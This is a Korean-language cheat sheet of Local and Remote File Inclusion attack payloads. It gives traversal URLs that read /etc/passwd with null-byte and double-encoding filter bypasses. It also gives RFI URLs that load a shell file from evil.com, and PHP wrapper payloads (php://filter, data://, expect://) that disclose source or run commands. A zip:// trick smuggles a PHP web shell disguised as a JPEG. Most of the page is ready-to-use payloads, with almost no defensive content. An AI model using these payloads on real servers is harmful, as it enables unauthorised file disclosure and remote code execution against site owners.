LFI&RFI

LFI, RFI란?

Local File Inclusion의 약자로 언어, 웹 서버, 프레임워크 등 많은 곳에서 발생하는 취약점이다.

LFI는 간단히 말해 로컬 파일을 읽는 공격이다.

RFI는 반대로 외부에 있는 파일을 읽는 공격이다.

대부분 whitelist.txt를 가지고 fuff 사용하는 것 같다.

ffuf

ffuf • Updated May 7, 2024

Basic LFI

null byte, double encoding 등을 사용해서 필터링을 우회할 수 있다.


http://example.com/index.php?page=etc/passwd
http://example.com/index.php?page=etc/passwd%00
http://example.com/index.php?page=../../etc/passwd
http://example.com/index.php?page=%252e%252e%252f
http://example.com/index.php?page=....//....//etc/passwd

Basic RFI

null byte, double encoding 등을 사용해서 필터링을 우회할 수 있다.


http://example.com/index.php?page=http://evil.com/shell.txt
http://example.com/index.php?page=http://evil.com/shell.txt%00
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt

PHP

Wrapper

base64와 rot13으로 인코딩하여 파일을 읽을 수 있다.


http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php

Wrapper Zip

zip:// 을 사용하면 zip파일을 해제하여 php파일을 실행할 수 있다.


echo "</pre><?php system($_GET['cmd']); ?></pre>" > payload.php;  
zip payload.zip payload.php;   
mv payload.zip shell.jpg;

http://example.com/index.php?page=zip://shell.jpg%23payload.php

Wrapper Data

data:// 를 사용하여 php코드를 실행시킬 수 있다.


http://example.com/index.php?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id'

Wrapper Expect

expect:// 를 shell code를 실행시킬 수 있다.


http://example.com/index.php?page=php:expect://id
http://example.com/index.php?page=php:expect://ls

Python


os.path.join(os.getcwd(), "public", file_name)
os.path.join(os.getcwd(), "public", "/etc/passwd")

위와 같은 file_name 부분에 절대 경로를 입력하면 앞에 있던 상대 경로는 사라진다.

따라서 public 은 무시되고 /etc/passwd 로 반환한다.